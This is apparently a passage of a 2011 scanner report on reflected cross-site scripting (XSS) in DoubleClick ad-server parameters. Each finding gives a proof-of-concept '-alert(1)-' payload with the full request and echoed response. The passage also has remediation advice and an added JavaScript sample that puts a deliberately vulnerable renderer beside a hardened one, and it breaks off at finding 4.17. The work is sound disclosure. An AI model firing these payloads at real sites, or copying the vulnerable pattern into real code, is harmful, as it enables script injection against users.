Date: Mon, 13 Jun 2011 12:17:05 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/f/189/%2a/p%3B242168662%3B0-0%3B0%3B64929697%3B3454-728/90%3B42471813/42489600/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L742ff"-alert(1)-"6805e040324&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfn
...[SNIP]...

4.11. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52a5f"-alert(1)-"97ebfb0646b was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must appear inside a JavaScript string literal, encode every character outside [A-Za-z0-9] as \xHH or \uHHHH before emitting it, so that quotes, backslashes, < and / cannot terminate the literal or the enclosing <script> element; HTML entity encoding is not sufficient here, because entities are not decoded inside script blocks. Since the reflected data is part of the click-through URL, validating that URL against an allow-list of schemes and hosts before it is used limits what an attacker can place there at all.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=52a5f"-alert(1)-"97ebfb0646b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7048
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:31:47 GMT
Expires: Mon, 13 Jun 2011 11:31:47 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=52a5f"-alert(1)-"97ebfb0646bhttp://www.samsclub.com/sams/pagedetails/content.jsp?pageName=fathersDay_2011&pid=VML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowsc
...[SNIP]...

4.12. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9767b"-alert(1)-"c087c4f6224 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must appear inside a JavaScript string literal, encode every character outside [A-Za-z0-9] as \xHH or \uHHHH before emitting it, so that quotes, backslashes, < and / cannot terminate the literal or the enclosing <script> element; HTML entity encoding is not sufficient here, because entities are not decoded inside script blocks. Since the reflected data is part of the click-through URL, validating that URL against an allow-list of schemes and hosts before it is used limits what an attacker can place there at all.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE9767b"-alert(1)-"c087c4f6224&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7090
Date: Mon, 13 Jun 2011 11:31:16 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
H3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE9767b"-alert(1)-"c087c4f6224&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fs
...[SNIP]...

4.13. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33607"-alert(1)-"8c4e642dafd was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must appear inside a JavaScript string literal, encode every character outside [A-Za-z0-9] as \xHH or \uHHHH before emitting it, so that quotes, backslashes, < and / cannot terminate the literal or the enclosing <script> element; HTML entity encoding is not sufficient here, because entities are not decoded inside script blocks. Since the reflected data is part of the click-through URL, validating that URL against an allow-list of schemes and hosts before it is used limits what an attacker can place there at all.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-749415602701834233607"-alert(1)-"8c4e642dafd&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7090
Date: Mon, 13 Jun 2011 11:31:45 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-749415602701834233607"-alert(1)-"8c4e642dafd&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

4.14. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 195c6"-alert(1)-"651f8671dd0 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must appear inside a JavaScript string literal, encode every character outside [A-Za-z0-9] as \xHH or \uHHHH before emitting it, so that quotes, backslashes, < and / cannot terminate the literal or the enclosing <script> element; HTML entity encoding is not sufficient here, because entities are not decoded inside script blocks. Since the reflected data is part of the click-through URL, validating that URL against an allow-list of schemes and hosts before it is used limits what an attacker can place there at all.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1195c6"-alert(1)-"651f8671dd0&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7090
Date: Mon, 13 Jun 2011 11:31:26 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1195c6"-alert(1)-"651f8671dd0&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl =
...[SNIP]...

4.15. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf0be"-alert(1)-"9c6f6bd22dd was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
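
The responses in this report build JavaScript by string concatenation (`var imgurl = '...'` in single quotes, `escape("...")` in double quotes), which is why a payload that merely closes the matching quote lands outside the string literal. The following is an added example, not code from the report or from DoubleClick: it shows the vulnerable rendering next to a hardened one, and a small tokenizer that reproduces the scanner's "echoed unmodified into a JavaScript string" check offline. The render functions, the tokenizer and the sample click URL (bidnw.example) are all constructed for this example.

```javascript
// Added example, not code from the XSS.CX/Burp report or from DoubleClick.
// Function names and the sample click-through URL are constructed.

// Vulnerable pattern: the click-through URL is pasted into a single-quoted
// JS string literal. A single quote in the URL ends the literal early.
function renderAdScriptVulnerable(clickUrl) {
  return "<script>\nvar imgurl = '" + clickUrl + "';\n</script>";
}

// Hardened pattern: JSON.stringify yields a valid double-quoted JS literal
// (quotes, backslashes and control characters escaped). The extra replacements
// neutralise characters that still matter inside an inline <script> element:
// '<' and '>' so "</script>" cannot close the element, '&' for markup
// contexts, and U+2028/U+2029, which some engines treat as line terminators.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderAdScriptHardened(clickUrl) {
  return "<script>\nvar imgurl = " + jsStringLiteral(clickUrl) + ";\n</script>";
}

// Minimal tokenizer: returns [start, end] index pairs of every single- or
// double-quoted string literal in a script body, honouring backslash escapes.
// It ignores comments and regex literals, which is enough for the one-line
// assignments seen in the ad responses.
function stringLiteralSpans(script) {
  const spans = [];
  let i = 0;
  while (i < script.length) {
    const quote = script[i];
    if (quote === '"' || quote === "'") {
      const start = i;
      i++;
      while (i < script.length && script[i] !== quote) {
        if (script[i] === "\\") i++; // skip the escaped character
        i++;
      }
      spans.push([start, i]); // i is at the closing quote, or at end of input
    }
    i++;
  }
  return spans;
}

// True when `needle` appears in the script outside every string literal,
// i.e. the injected text would be parsed as code rather than data.
function occursOutsideStrings(script, needle) {
  const spans = stringLiteralSpans(script);
  let from = 0;
  while (true) {
    const idx = script.indexOf(needle, from);
    if (idx === -1) return false;
    if (!spans.some(([s, e]) => idx > s && idx < e)) return true;
    from = idx + 1;
  }
}

// The scanner's canary: random prefix, a quote, "-alert(1)-", the same quote,
// random suffix. Two variants are needed because only the quote style that
// matches the surrounding literal terminates it.
function canary(quote) {
  return "bf0be" + quote + "-alert(1)-" + quote + "9c6f6bd22dd";
}

// Does `render` let the canary reach code context? Reproduces the scanner's
// "echoed unmodified into a JavaScript string" condition without a browser.
function breaksOut(render, quote) {
  const baseUrl = "http://bidnw.example/bclick?_f=7adc4d0e&_a=18121040"; // constructed
  const html = render(baseUrl + canary(quote));
  const body = html.slice(html.indexOf(">") + 1, html.lastIndexOf("</script>"));
  return occursOutsideStrings(body, "alert(1)");
}

// breaksOut(renderAdScriptVulnerable, "'") -> true   (the 4.17-4.26 pattern)
// breaksOut(renderAdScriptVulnerable, '"') -> false  (wrong quote style)
// breaksOut(renderAdScriptHardened, "'")   -> false
```

The double-quoted `escape("...")` context in 4.15 and 4.16 is the same defect with the other quote style, which is why the scanner sends a `"` variant there. JSON.stringify on its own is not sufficient inside a `<script>` element (it leaves `<`, `>` and the U+2028/U+2029 line terminators untouched), hence the extra escapes; the better fix, as the remediation text says, is not to build script text from request data at all, for example by passing the URL in a data attribute or a JSON blob the creative reads at runtime.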

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQbf0be"-alert(1)-"9c6f6bd22dd&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7090
Date: Mon, 13 Jun 2011 11:31:35 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQbf0be"-alert(1)-"9c6f6bd22dd&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...

4.16. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19d1b"-alert(1)-"fc80ffc9911 was submitted in the sz parameter. This input was echoed unmodified in the application's response. Note that the scanner treats everything after sz= up to the first & as this parameter's value, so the payload was appended after sa=L inside the embedded click-through URL (see the request below) rather than after 300x250; the effective injection point is the click URL carried in the path.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L19d1b"-alert(1)-"fc80ffc9911&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7090
Date: Mon, 13 Jun 2011 11:31:06 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
rl = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/f/18e/%2a/r%3B242168639%3B0-0%3B0%3B64929701%3B4307-300/250%3B42471810/42489597/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=L19d1b"-alert(1)-"fc80ffc9911&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIF
...[SNIP]...

4.17. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17d8f'-alert(1)-'1694ab6b6d6 was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

